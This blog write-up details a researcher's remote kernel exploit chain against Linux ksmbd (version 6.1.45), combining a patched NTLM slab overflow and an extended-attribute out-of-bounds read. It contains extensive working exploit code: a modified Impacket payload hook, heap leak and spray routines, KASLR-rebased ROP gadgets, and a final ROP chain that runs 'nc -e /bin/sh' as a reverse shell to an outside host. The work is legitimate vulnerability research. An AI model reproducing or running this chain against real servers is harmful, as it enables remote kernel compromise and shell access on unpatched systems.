What would a vulnerability researcher's magnum opus be? For me, it would be a 0-click 0-day exploit chain against a popular platform or device in the modern era. No interaction needed, system pwned.
Unfortunately, this is a difficult task to achieve these days. So towards the end of my post-grad summer, I decided to practice designing a stable (> 95% success rate) authenticated 0-click exploit from real-world CVEs. As you likely guessed from the title, we are targeting ksmbd, or Kernel SMB3 Daemon. Yes, you heard that right, Linux has a kernelspace SMB3 server because userspace just isn’t enough. Thank you, Microsoft!
The beginning of many remote bugs... |
Here is a demo of my end to end exploit (at a 2x speedup)!
Onto the writeup now.
ksmbd makes sense as a target for a multitude of reasons.
- It is reachable over the network
- It has a ton of vulnerabilities, including a 0-click RCE exploit from Guillaume Teissier and Quentin Minster of Thalium (end of 2022)
- Many of these vulnerabilities are not hard to reach and are quite surprising to appear in such abundance in the modern era
- There has been existing research on attacking ksmbd: the aforementioned 0-click has a whole online video, which I highly recommend you to watch. I myself found an unauthenticated remote DOS back in 2023 with Hrvoje Misetic, and there are a multitude of other posts discussing vulnerabilities from pwning.tech to doynsec
- ZDI also has a nice collection of advisories for the vulnerabilities as well that gave me a quick overview of each CVE’s exploit implications
- There may be a lot of existing work on discussing vulnerabilities, but there is only one major presentation as I mentioned earlier... where is the fun in vulnerability research if you don’t write exploits?
I would have to say the only “downside” from a coolness factor is that ksmbd is rarely deployed in production. To every sysadmin out there, keep it this way for your own sake.
Choosing the Bugs
I perused through the ZDI 2024 advisories and decided upon two CVEs. Network RCE exploits generally requires multiple bugs, and each bug has to provide a very useful primitive, since we no longer have the ability to locally manipulate the internal kernel state through syscalls. They remind me in a way of the notorious heap note challenges from CTFs.
My target was 6.1.45, a 2 year out-of-date version, running on a single x86_64 core with all the available standard mitigations (SMAP, SMEP, KPTI, KASLR, CONFIG_SLAB_FREELIST_RANDOM, CONFIG_SLAB_FREELIST_HARDENED, etc.). I really hope no one is running this version with ksmbd enabled and exposed…
ZDI-24-229 (CVE-2023-52440) was the first: ksmbd: fix slub overflow in ksmbd_decode_ntlmssp_auth_blob()
. This bug was discovered by Pumpkin of DEVCORE. Let us take a look at the patch:
int ksmbd_decode_ntlmssp_auth_blob(struct authenticate_message *authblob, if (blob_len < (u64)sess_key_off + sess_key_len) return -EINVAL; + if (sess_key_len > CIFS_KEY_SIZE) + return -EINVAL; + ctx_arc4 = kmalloc(sizeof(*ctx_arc4), GFP_KERNEL); if (!ctx_arc4) return -ENOMEM;
This vulnerable snippet can be triggered during NTLM authentication through a SMB2_SESSION_SETUP
message. Since sess_key_len
is user controlled, we can cause an overflow of the fixed size sess_key
buffer when executing cifs_arc4_crypt
. This is actually quite an easy bug to trigger and gives us a controlled SLUB overflow.
In Impacket (commit 7561038277f4b08a16f37aac886cfe0193e75434), you can trigger this bug by just modifying a single line in getNTLMSSPType3
in ntlm.py
. You can set session_key
in ntlmChallengeResponse
to a blob of any length, and you can achieve a controlled SLUB overflow by running cifs_arc4_crypt
on the target payload with sessionBaseKey
as the context.
if version is not None: ntlmChallengeResponse['Version'] = version ntlmChallengeResponse['ntlm'] = ntResponse if encryptedRandomSessionKey is not None: if os.getenv('IMPACKET_OVERFLOW_NTLM'): print('making evil session_key') ctx = ARC4Ctx() cifs_arc4_setkey(ctx, sessionBaseKey, len(sessionBaseKey)) data = base64.b64decode(os.getenv('IMPACKET_OVERFLOW_NTLM')) ntlmChallengeResponse['session_key'] = cifs_arc4_crypt(ctx, data) else: ntlmChallengeResponse['session_key'] = encryptedRandomSessionKey return ntlmChallengeResponse, exportedSessionKey
Honestly, this is an awesome primitive: unauthenticated remote controlled heap overflow of content and size. Based on the Thalium primitive, this is the equivalent of their “writeheap” primitive. We are restricted to kmalloc-512 with the bug here.
Now, we need to find a leakage vector. This vector is actually what
downgraded our 0-click from an “unauthenticated” one to an
“authenticated” one, just like the Thalium 0-click. We require a primitive that leaks contents back through the response buffers. I decided on ZDI-24-587, which is an authenticated remote leak bug. Pumpkin discovered this yet again and it is assigned CVE-2023-4130. Let us take a look at the commit, which is titled ksmbd: fix wrong next length validation of ea buffer in smb2_set_ea()
.
diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c index 9849d748934599..7cc1b0c47d0a20 100644 --- a/fs/smb/server/smb2pdu.c +++ b/fs/smb/server/smb2pdu.c next: break; buf_len -= next; eabuf = (struct smb2_ea_info *)((char *)eabuf + next); - if (next < (u32)eabuf->EaNameLength + le16_to_cpu(eabuf->EaValueLength)) + if (buf_len < sizeof(struct smb2_ea_info)) { + rc = -EINVAL; break; + } + if (buf_len < sizeof(struct smb2_ea_info) + eabuf->EaNameLength + + le16_to_cpu(eabuf->EaValueLength)) { + rc = -EINVAL; + } } while (next != 0); kfree(attr_name);
Given write access to the SMB share filesystem, a user can write
extended attributes onto files, which Linux emulates through xattr in
the vfs layer. Utilizing this feature in impacket requires us to use the
setInfo
function on SMB3
objects with infoType
set as SMB2_0_INFO_FILE
and fileInfoClass
set as SMB2_FULL_EA_INFO
.
Looking at the original vulnerable code:
do { if (!eabuf->EaNameLength) goto next; ksmbd_debug(SMB, "name : <%s>, name_len : %u, value_len : %u, next : %u\n", eabuf->name, eabuf->EaNameLength, le16_to_cpu(eabuf->EaValueLength), le32_to_cpu(eabuf->NextEntryOffset)); if (eabuf->EaNameLength > (XATTR_NAME_MAX - XATTR_USER_PREFIX_LEN)) { rc = -EINVAL; break; } memcpy(attr_name, XATTR_USER_PREFIX, XATTR_USER_PREFIX_LEN); memcpy(&attr_name[XATTR_USER_PREFIX_LEN], eabuf->name, eabuf->EaNameLength); attr_name[XATTR_USER_PREFIX_LEN + eabuf->EaNameLength] = '\0'; value = (char *)&eabuf->name + eabuf->EaNameLength + 1; if (!eabuf->EaValueLength) { rc = ksmbd_vfs_casexattr_len(user_ns, path->dentry, attr_name, XATTR_USER_PREFIX_LEN + eabuf->EaNameLength); /* delete the EA only when it exits */ if (rc > 0) { rc = ksmbd_vfs_remove_xattr(user_ns, path->dentry, attr_name); if (rc < 0) { ksmbd_debug(SMB, "remove xattr failed(%d)\n", rc); break; } } /* if the EA doesn't exist, just do nothing. */ rc = 0; } else { rc = ksmbd_vfs_setxattr(user_ns, path->dentry, attr_name, value, le16_to_cpu(eabuf->EaValueLength), 0); if (rc < 0) { ksmbd_debug(SMB, "ksmbd_vfs_setxattr is failed(%d)\n", rc); break; } } next: next = le32_to_cpu(eabuf->NextEntryOffset); if (next == 0 || buf_len < next) break; buf_len -= next; eabuf = (struct smb2_ea_info *)((char *)eabuf + next); if (next < (u32)eabuf->EaNameLength + le16_to_cpu(eabuf->EaValueLength)) break; } while (next != 0);
And the original struct:
struct smb2_ea_info { __le32 NextEntryOffset; __u8 Flags; __u8 EaNameLength; __le16 EaValueLength; char name[1]; /* optionally followed by value */ } __packed; /* level 15 Query */
We can see that in the next
block, we can trick ksmbd into thinking there are additional smb2_ea_info
entries by setting NextEntryOffset
to a malicious value, as long as we do not exceed our buffer bounds. However, we can still type-confuse this fake next smb2_ea_info
with our controlled data in the current name
field to provide us with an evil EaValueLength
. This will allow the subsequent ksmbd_vfs_setxattr
to store OOB read data of adjacent heap chunks into xattr, which we can fetch with SMB3.queryInfo
using the same fileInfoClass
. The only limitation is that our leak is somewhat limited due to this nonsensical check, which I am pretty sure is a mistake given the context. It requires the sum of our type-confused EaNameLength
and EaValueLength
be under the next
value. Regardless, we can still achieve some substantial leaks from
this. This is the equivalent of the “writeleak” primitive from the
Thalium 0-click.
I constructed the following make_evil
primitive to construct malicious smb2_ea_info
structs for me:
# will leak -0x10 less def make_evil(size): assert(size >= 0x20) # 12 bytes left till size after this evil_ea_name = b'evil.name' + b''.ljust(size - 12 - 9 + 1 - 12, b'A') + b'\x00\x00\x00' evil_value_name = p32(0) + p8(0) + p8(3) + p16(size - 0x10) + b'oof\x00' evil_entry = FILE_FULL_EA_INFORMATION() evil_entry['NextEntryOffset'] = size - 12 evil_entry['Flags'] = 0 evil_entry['EaNameLength'] = len(evil_ea_name) - 1 evil_entry['EaValueLength'] = len(evil_value_name) evil_entry['EaName'] = evil_ea_name evil_entry['EaValue'] = evil_value_name return evil_entry
This structure is inlined with smb request structures (more on this
later) in ksmbd, so we construct the name buffer to pad this request
allocation to size
to leak size - 0x10
bytes. If you look at this carefully, we point NextEntryOffset
to the value buffer to type confuse it as another smb2_ea_info
structure. The fake EaNameLength
and fake EaValueLength
are all chosen to pass the nonsensical check.
The evil smb2_ea_info object |
Using make_evil
, I can construct a leak
primitive.
def leak(leaker, tid, fid, amount): # can't arbitrarily leak because of this nonsensical check # https://elixir.bootlin.com/linux/v6.1.45/source/fs/smb/server/smb2pdu.c#L2343 entries = [make_evil(amount-0x65)] entries = [e.getData() for e in entries] leaker.setInfo( tid, fid, inputBlob=b''.join(entries), infoType=SMB2_0_INFO_FILE, fileInfoClass=SMB2_FULL_EA_INFO ) result = leaker.queryInfo( tid, fid, fileInfoClass=SMB2_FULL_EA_INFO ) _, leak = deserialize_ea(result) leak = leak[2:] dump_x_gx(leak) return leak
While this will leak kernel heap contents, the next controlled allocation almost never lands where this leaky request was allocated, so we cannot use it to reliably predict the exact heap layout.
To summarize, on Linux 6.1.45 (as the leak bug was backported by 6.1.46), we can pwn ksmbd through users with write access to a share. I consider this an authenticated 0-click as you would need user credentials, but I am sure that there is at least one sysadmin out there who allows anonymously writeable shares.
Here is the sample ksmbd.conf file I used to simulate a vulnerable system.
[CompanyShare] ; share parameters force user = fossboss path = /CompanyShare read only = no
Kernel slabs are also technically per-CPU so I did most of my development on a single core setup. The approach I present applies to multi-core setups though, at the cost of some speed (and stability issues at the end). For what it's worth, the exploit successfully worked with 2 cores too.
ksmbd Crash Course + Thalium's Strategy
Before continuing onto the exploit, I shall provide an extremely high-level overview of some important ksmbd behaviors, and discuss the changes in exploit strategies since the Thalium 0-click.
The two most important structs in our exploit are ksmbd_conn
(kmalloc-1k) and ksmbd_session
(kmalloc-512). If you are unfamiliar with the Linux slub allocator, I recommend this presentation. There is a plethora of other structs in this subsystem, but I did not need any of them for the exploit.
Ksmbd operates from kernel worker threads. On a new tcp connection, a ksmbd_conn
object is allocated through kzalloc and the kernel calls ksmbd_conn_handler_loop
in a new thread. The request buffer has a dynamic size and is allocated in this function. This is useful because smb2_ea_info
is allocated inline in this request, providing us a with dynamic heap
allocation primitive. Sadly, the request is freed right after handling.
From my debugging, the initial header before the first smb2_ea_info
struct took up 0x65 bytes. Note that by using this primitive in kmalloc-1k to leak adjacent ksmbd_conn
contents, we achieve a KASLR bypass due to the use of pointers to kernel data section.
Then process_fn
from default_conn_ops
is called, which subsequently sends the request for processing in a worker thread through ksmbd_server_process_request
-> queue_ksmbd_work
. Work processing eventually calls __handle_ksmbd_work
, which finally dispatches __process_request
.
There are many different cmd handlers, such as the one that leads to the OOB read vulnerability. The one we particularly care about is the session setup cmd, which is defined here and creates a ksmbd_session
object. This represents a single session in a ksmbd tcp connection, and it is allocated here through kzalloc.
Session setup via NTLM takes place in two parts, as it is a challenge response protocol. Note that while the session object is allocated during the challenge phase, the SLUB overflow happens in the challenge part of the protocol, and we can repeatedly re-run that part of the protocol. This will prove extremely useful later on.
Now, let's discuss some changes I observed in ksmbd since the Thalium 0-click.
Because kmalloc-512 is relatively noisy, their exploit relied on something known as compound requests (which was also the source of many ksmbd bugs). This way, multiple sessions could be allocated in one go via a tight loop, with less chance of other interfering allocations. However, when allocating a new session, ksmbd expires other sessions in the connection that have finished authentication, but we wouldn’t be able to do that without first receiving a response due to the challenge-response nature of NTLM.
Another trick in their exploit was tampering with ksmbd_session->id
to side-channel out information regarding the results of an overflow
(such as which session was affected, etc.). However, at least
from my experiments, this is no longer possible since there seems to be a per-connection xarray and a global hash table for tracking sessions.
Thalium also had an awesome heap spray primitive that no longer
exists. The idea was to hang the tcp read attempt of the whole request
in ksmbd_tcp_readv
. Unfortunately, ksmbd limits data reception to 2 attempts now with very short timeout intervals.
Their last trick, which is still applicable today, was for RIP control. They overflowed the nls_table
pointer in the ksmbd_session
object to redirect it to a forged object with a malicious vtable. Then,
during the NTLM response phase (which we can repeatedly run), the
following call chain happens: ntlm_authenticate
-> session_user
-> smb_strndup_from_utf16
-> smb_utf16_bytes
, which uses a function pointer to fetch character lengths. However, this pointer now exists in kmalloc-1k as part of ksmbd_conn
,
so we will need to find a way to transform our memory corruption
primitive in kmalloc-512 to affect kmalloc-1k. I did not look for some other target in kmalloc-512, but I'm sure one exists.
Ok, now let’s get to pwning ksmbd.
Our New Strategy
Let’s first analyze how we can spray. For each connection, we can allocate a ksmbd_conn
and a ksmbd_session
object. How many can we have at once? How long can each connection last?
The answers to those questions are determined by the server_conf
module global. max_connections
determines the active connection limit, and deadtime
determines the timeout. By default, the values were 0x80 and 0x0,
respectively, with 0 for the latter representing infinite time. The
maximum connection count is good for us because kmalloc-512 and
kmalloc-1k only have 16 elements per slab, making it easier to
massage the heap with freelist randomization.
However, as I discovered later in the exploit, not only is kmalloc-512 busy, kmalloc-1k is also an active slab, especially due to tcp replies from ksmbd! I have found the kernel kmem trace framework extremely useful for debugging heap noise and highly recommend others try it out (I have used this to debug cross cache attacks in my other recent exploits). Anyways, this was a backtrace I repeatedly saw that was causing activity in kmalloc-1k:
kworker/0:4-302 [000] ..... 94.399734: kmalloc: call_site=tcp_stream_alloc_skb+0x28/0x130 ptr=ffff888102d32000 bytes_req=1024 bytes_alloc=1024 gfp_flags= node=-1 accounted=false kworker/0:4-302 [000] ..... 94.399741: <stack trace> => trace_event_raw_event_kmalloc => __kmalloc_node_track_caller => __alloc_skb => tcp_stream_alloc_skb => tcp_sendmsg_locked => tcp_sendmsg => sock_sendmsg => ksmbd_tcp_writev => ksmbd_conn_write => handle_ksmbd_work => process_one_work => worker_thread => kthread
Luckily, this chunk is often freed after e1000 processing, before other kmalloc-1k allocations.
<idle>-0 [000] ..s2. 94.402376: kfree: call_site=skb_release_data+0x139/0x180 ptr=ffff888102d32000 <idle>-0 [000] ..s2. 94.402395: <stack trace> => trace_event_raw_event_kfree => kfree => skb_release_data => __kfree_skb => tcp_ack => tcp_rcv_established => tcp_v4_do_rcv => tcp_v4_rcv => ip_protocol_deliver_rcu => ip_local_deliver_finish => ip_sublist_rcv_finish => ip_sublist_rcv => ip_list_rcv => __netif_receive_skb_list_core => netif_receive_skb_list_internal => napi_complete_done => e1000_clean
Generally, these ephemeral allocations didn’t cause too much of an issue during a short window, but I did encounter a lot more instability when expecting the heap state to remain the same over a longer period of time. This means we have to be very precise with the sessions we choose to utilize for triggering primitives in our exploit, rather than blindly gunning for a homerun with a large spray.
Remember from earlier that our overflow is in kmalloc-512, but our
target pointer to corrupt for vtable hijacking is in kmalloc-1k?
We can rely on the overflow bug to overwrite one of the many pointers
that ksmbd_session
frees in order to trigger an arbitrary free primitive onto kmalloc-1k. In fact, one such pointer is the Preauth_HashValue
field, which can be freed in the response phase of session setup. There aren’t checks against misaligned frees from the allocator, so we can now
allocate an object with our controlled data to overlap with an existing ksmbd_conn
object to overwrite the local_nls
field.
Pivoting from kmalloc-512 overflow to kmalloc-1k overwrite |
This overflow into ksmbd_session
poses some problems, though. When overflowing into the adjacent ksmbd_session
struct, many of the fields afterwards are overridden. We must keep this connection alive to avoid a crash in ksmbd_session_destroy
. For example, id
actually poses a major issue. An incorrect value here leads to a double
free, which the allocator catches, so we must also identify this
session and keep it alive. I did not look too far into why this is the
case, though assume it has to do with the fact that sessions are kept
track in separate structures and an id mismatch causes some sort
of desynchronization.
Overflow and corruption of ksmbd_session object |
Exploit Development
The first goal would be to leak the contents of a ksmbd_session
to help us keep the overflowed ksmbd_session
in a “valid” state during our operations (asides from disconnection). I first created a leaker
connection to achieve this.
def conn(): return SMBConnection(ADDRESS, TARGET_IP, sess_port=PORT, preferredDialect=SMB2_DIALECT_311, timeout=30000) def open_file(conn, tid): return conn.create( tid, FILENAME, desiredAccess=FILE_READ_DATA | FILE_WRITE_DATA | FILE_READ_ATTRIBUTES | FILE_WRITE_ATTRIBUTES | FILE_READ_EA | FILE_WRITE_EA, shareMode=FILE_SHARE_READ | FILE_SHARE_WRITE, creationOptions=FILE_NON_DIRECTORY_FILE, creationDisposition=FILE_OVERWRITE_IF, fileAttributes=FILE_ATTRIBUTE_NORMAL ) leaker = conn() leaker.login(USER, PW, DOMAIN) leaker = leaker._SMBConnection assert leaker.getDialect() == SMB2_DIALECT_311
Then, we spam a bunch of ksmbd_session
objects left in
the first stage of the session request. Normally, Impacket completes the
challenge and response in one function, but I broke login
apart into login_init
and login_finish
.
We can identify valid session objects and track the owning connection through the ClientGUID
field. By default, impacket uses a random string, but I added a fixed
string component of 10 C’s for identification purposes. Now, we can repeatedly
allocate connections, attempt a leak, and check for a live connection’s
GUID. If none exist, we close all the currently sprayed connections and
try again. This spray, check, free loop is a common pattern in this
exploit and makes it very reliable.
spray1 = 0x18 spray2 = spray1 + 0x10 spray3 = spray2 + 0x18 spray4 = spray3 + 0x18 conns = [None for i in range(spray4)] kmalloc512_leak = None kmalloc512_leak_q = None kmalloc1k_leak = None kmalloc1k_leak_q = None target_conn = None tid = leaker.connectTree(SHARE) fid = open_file(leaker, tid) while True: for i in range(spray1): log.info(f"spraying conn {i}") # struct ksmbd_conn alloc conns[i] = conn() # struct ksmbd_session alloc conns[i]._SMBConnection.login_init(USER, PW, DOMAIN) # spray and retry, because of slab noise and slab randomization # a bigger kmalloc-1024?, then kmalloc-512, potentially a few other allocs log.info('leakage of kmalloc-512') kmalloc512_leak = leak(leaker, tid, fid, 0x200) kmalloc512_leak_q = extract_qwords(kmalloc512_leak) if kmalloc512_leak_q[2] != 0x4343434343434343: log.info('leak failed, trying again') for i in range(spray1): conns[i]._SMBConnection.close_session() fid = open_file(leaker, tid) else: break
0x10 - 0x18 makes sense for a spray parameter due to the fact that both kmalloc-512 and kmalloc-1k only hold 16 items each.
After leaking a valid ksmbd_session
, I reuse the data
for the SLUB overflow portion of the exploit. My goal here is not to perform the arbitrary free next, but to identify the overflowed
connection (labeled as overflowed_conn
in the exploit). This way, I can pinpoint the exact victim connection to
narrow the window between freeing and reclaiming with a ksmbd request. The leaked data won't cleanly preserve an overflowed session, but is enough for it survive the next step.
While the session id can no longer act as an oracle, corrupting the
session state for a subsequent operation that is not echo, negotiation or session setup can act as a substitute. The relevant call chain starts from here, which calls ksmbd_session_lookup_all
and makes this check.
If we finish session setup on all of the sprayed sessions, and subsequently overflow a connection, we can then attempt a share connect for all of the
sprayed sessions. The failed one will respond with an error. We can also
repeat this in a loop until an overflow actually happens. The session
object from which the overflow happens must remain alive, but we have at
least 0x20 chances for this to occur. I have not observed more than 5-6
attempts for a successful overflow as the slab has few objects.
overflowed_conn = None failed_evils = [] while True: evil = conn() for i in range(spray1, spray2): log.info(f"spraying conn {i}") conns[i] = conn() conns[i]._SMBConnection.login_init(USER, PW, DOMAIN) log.info(f"allocate evil") # ksmbd_session allocate evil._SMBConnection.login_init(USER, PW, DOMAIN) for i in range(spray2, spray3): log.info(f"spraying conn {i}") conns[i] = conn() conns[i]._SMBConnection.login_init(USER, PW, DOMAIN) for i in range(spray1, spray3): conns[i]._SMBConnection.login_finish() # set a potential state as in progress to see if any error payload = (b'Z' * 40 + (kmalloc512_leak[0x68:]).ljust(0x200 - 0x68, b'Z') + kmalloc512_leak[:0x34]) + p32(1) os.environ['IMPACKET_OVERFLOW_NTLM'] = base64.b64encode(payload).decode() # note when logging in, a kmalloc-512 allocation is made and then freed for storing cipher stuff evil._SMBConnection.login_finish() os.environ.pop("IMPACKET_OVERFLOW_NTLM", None) for i in range(spray1, spray3): try: log.info(f'attempting tree connect on {i}') conns[i]._SMBConnection.connectTree(SHARE) except impacket.smb3.SessionError: overflowed_conn = i log.info(f'overflowed connection: {overflowed_conn}') break if overflowed_conn is None: # note that we are limited in total attempts in this # but we should be able to hit in a few tries at most log.info('overflow failed, retrying') for i in range(spray1, spray3): conns[i]._SMBConnection.close_session() failed_evils.append(evil) else: break
Once we have achieved an overflow against an exploitable heap layout, we can repeat the overflow from the evil
session onto the overflow_conn
session to reliably help trigger an arbitrary free.
Next, we would need a heap leak to find a ksmbd_conn
object as well as a KASLR leak. The ksmbd_conn
connection provides both. The srv_mutex
field has a linked list
that points to itself. There are multiple pointers to kernel data at
the start of the object. We can repeat the same strategy as earlier but with an evil smb2_ea_info
in kmalloc-1k: we identify whether we have leaked an active connection through the GUID field,
and try again otherwise.
while True: for i in range(spray3, spray4): log.info(f"spraying conn {i}") conns[i] = conn() conns[i]._SMBConnection.login_init(USER, PW, DOMAIN) # a bigger kmalloc-2048?, then kmalloc-1024, potentially a few other allocs log.info('leakage of kmalloc-1024') kmalloc1k_leak = leak(leaker, tid, fid, 0x400) kmalloc1k_leak_q = extract_qwords(kmalloc1k_leak) if kmalloc1k_leak_q[0] & 0xffff == 0xdd00: guid = (p64(kmalloc1k_leak_q[35]) + p64(kmalloc1k_leak_q[36])).decode() print(f'guid is: {guid}') for i in range(spray4): if guid == conns[i]._SMBConnection.ClientGuid: target_conn = i log.info(f'found target conn based on guid at {target_conn}') if target_conn != None: break log.info('failed, trying again') for i in range(spray3, spray4): conns[i]._SMBConnection.close_session() fid = open_file(leaker, tid)
With this pointer leaked, we can arbitrarily free a misaligned chunk (named target
) above the leaked ksmbd_conn
object to prepare for an overwrite by triggering the response phase of session
setup. I calculated the offsets of a few gadgets I used to finish the
exploit at this point.
target = kmalloc1k_leak_q[6] - 0x30 - 0x1c0 smb311_server_values = kmalloc1k_leak_q[0] kaslr_base = smb311_server_values - (0xffffffff82fcdd00 - 0xffffffff81000000) rebase = lambda orig_addr : kaslr_base + (orig_addr - 0xffffffff81000000) # 0xffffffff810f4533: leave ; ret ; leave_ret = rebase(0xffffffff810f4533) # 0xffffffff81031157: pop rdi ; ret ; pop_rdi = rebase(0xffffffff81031157) # 0xffffffff8105c524: pop rsi ; ret ; pop_rsi = rebase(0xffffffff8105c524) # 0xffffffff810aac72: pop rdx ; ret ; pop_rdx = rebase(0xffffffff810aac72) # 0xffffffff81245e83: pop rcx ; ret ; pop_rcx = rebase(0xffffffff81245e83) # 0xffffffff811eaf20: pop rsp ; ret ; pop_rsp = rebase(0xffffffff811eaf20) ''' x/50gx 0xffffffff82e5ee00 0xffffffff82e5ee00 <envp.0>: 0xffffffff827e612a 0xffffffff827e6131 0xffffffff82e5ee10 <envp.0+16>: 0xffffffff82843918 0x0000000000000000 ''' envp = rebase(0xffffffff82e5ee00) call_usermodehelper = rebase(0xffffffff810e9e40) msleep = rebase(0xffffffff8115ffc0) log.info(f'kaslr: {hex(kaslr_base)}') log.info(f'stack pivot: {hex(leave_ret)}') log.info(f'pop rdi: {hex(pop_rdi)}') log.info(f'pop rsi: {hex(pop_rsi)}') log.info(f'pop rdx: {hex(pop_rdx)}') log.info(f'pop rcx: {hex(pop_rcx)}') log.info(f'pop_rsp: {hex(pop_rsp)}') log.info(f'envp: {hex(envp)}') log.info(f'call_usermodehelper: {hex(call_usermodehelper)}') log.info(f'msleep: {hex(msleep)}') log.info(f'choosing our target: {hex(target)}') payload = (b'Z' * 40 + (kmalloc512_leak[0x68:]).ljust(0x200 - 0x68, b'Z') + p64(0xbaad) + p16(0x311) + b'X' * 16 + kmalloc512_leak[0x8+18:0x38] + p64(target)) os.environ['IMPACKET_OVERFLOW_NTLM'] = base64.b64encode(payload).decode() # note when logging in, a kmalloc-512 allocation is made and then freed for storing cipher stuff evil._SMBConnection.login_finish() os.environ.pop("IMPACKET_OVERFLOW_NTLM", None)
Our end goal is to just call call_usermodehelper
to pop a reverse shell and put the kernel thread into infinite sleep with msleep
in the ROP chain.
With the arbitrary free, we can reclaim the misaligned chunk and overwrite the target ksmbd_conn
object with a large enough ksmbd request to go into kmalloc-1k. The
data we control has to start a bit further into the request because earlier parts of the payload get overwritten (perhaps by tcp sk_buff
processing?).
Initially, I hijacked the local_nls
pointer to redirect to a vtable (forged upon the ksmbd_conn
object) where the function pointer had the value of 0x1337babebaadbeef
. The kernel crash showed the following:
[ 209.080442] RAX: 1337babebaadbeef RBX: 0000000000000000 RCX: ffff888102d97b00 [ 209.084157] RDX: 0000000000000006 RSI: ffffc90000043db2 RDI: 0000000000000066 [ 209.087849] RBP: ffff888102d97b00 R08: ffff888102d97c00 R09: 0000000000000052 [ 209.091570] R10: 000000000000000a R11: d9b8d6dba644bded R12: ffff888102f70052 [ 209.095254] R13: 0000000000000008 R14: 0000000000000010 R15: 0000000000000000
In this case, the target for the arbitrary free was 0xffff888102d97a40
,
so we control the contents that rbp, rcx, and r8 point to (potentially
at an offset). The rbp and rcx registers also point to the base of the nls_table
object we forged.
To successfully ROP, we would have to stack pivot into the misaligned
chunk with our controlled data. These days, finding good kernel gadgets
with traditional ROP chain tooling like rp++ or ROPGadget can be
frustrating due to runtime patching and micro-architectural side-channel mitigations - I usually just revert to using objdump. Luckily for us here, we control rbp so we can just rely on a leave; ret
gadget to pivot into our controlled data. Here is how I laid out the ROP chain:
cmd_base = target + 0x168 cmd = [b'/usr/bin/nc.traditional\x00', b'-e\x00', b'/bin/sh\x00', b'ctfi.ng\x00', b'16549\x00'] cmd_argv = b''.join( map(p64, (cmd_base + offset for offset in accumulate([0] + [len(x) for x in cmd[:-1]]))) ) evil_nls = (p64(0x4141414141414141) + p64(pop_rdi) + p64(leave_ret) + p64(pop_rdi) + p64(cmd_base) + p64(pop_rsi) + p64(target + 0x138) + p64(pop_rdx) + p64(envp) + p64(pop_rcx) + p64(0) + p64(call_usermodehelper) + p64(pop_rdi) + p64(0x7fffffff) + p64(msleep) + cmd_argv + p64(0x0) + b''.join(c for c in cmd)) payload = (b'\x68' * (0x4+8*11) + evil_nls.ljust(0x1c0-0x68-8*11, b'\x68') + kmalloc1k_leak[:0x58] + p64(target+0xc0) + kmalloc1k_leak[0x60:0x238-0x70]) log.info(f'payload len: {hex(len(payload))}') log.info('triggering arb free') # free preauth_hash with authentication path conns[overflowed_conn]._SMBConnection.login_finish() try: leaker.setInfo( tid, fid, inputBlob=payload, infoType=SMB2_0_INFO_FILE, fileInfoClass=SMB2_FULL_EA_INFO ) except: pass log.info('vtable should be hijacked') conns[target_conn]._SMBConnection.login_finish()
Then, in the last line, we just attempt the second stage of session setup on the corrupted ksmbd_conn
object to trigger the ROP chain and pop a reverse shell!
The whole exploit can be found here.
There are some limitations though. The last stage is unstable on multi-core setups due to per-CPU slabs. The corrupted connections must remain alive, and some commands will cause the kernel to crash due to the corrupted heap. In a real world exploit, one would have to spend time to clean up the kernel after receiving a reverse shell (if that's what they even want) for post-exploitation stability and persistence. I did not really spend any time attempting those ideas as this was meant as just a research exercise :)
Overall, this was my first attempt at a kernel network 0-click exploit. ksmbd isn’t very commonly deployed, but this was still a really fun exercise - hopefully I can eventually find my magnum opus of an exploit! Thank you to syst3mfailure.io for the support during this experience and to the rest of the Crusaders of Rust security research group for feedback on this article. Thank you also to the MATCHA group at MIT CSAIL for the opportunity of a post-grad, summer of kernel security research. As always, feel free to let me know of any questions, concerns, corrections, inquiries, or anything else.
No comments:
Post a Comment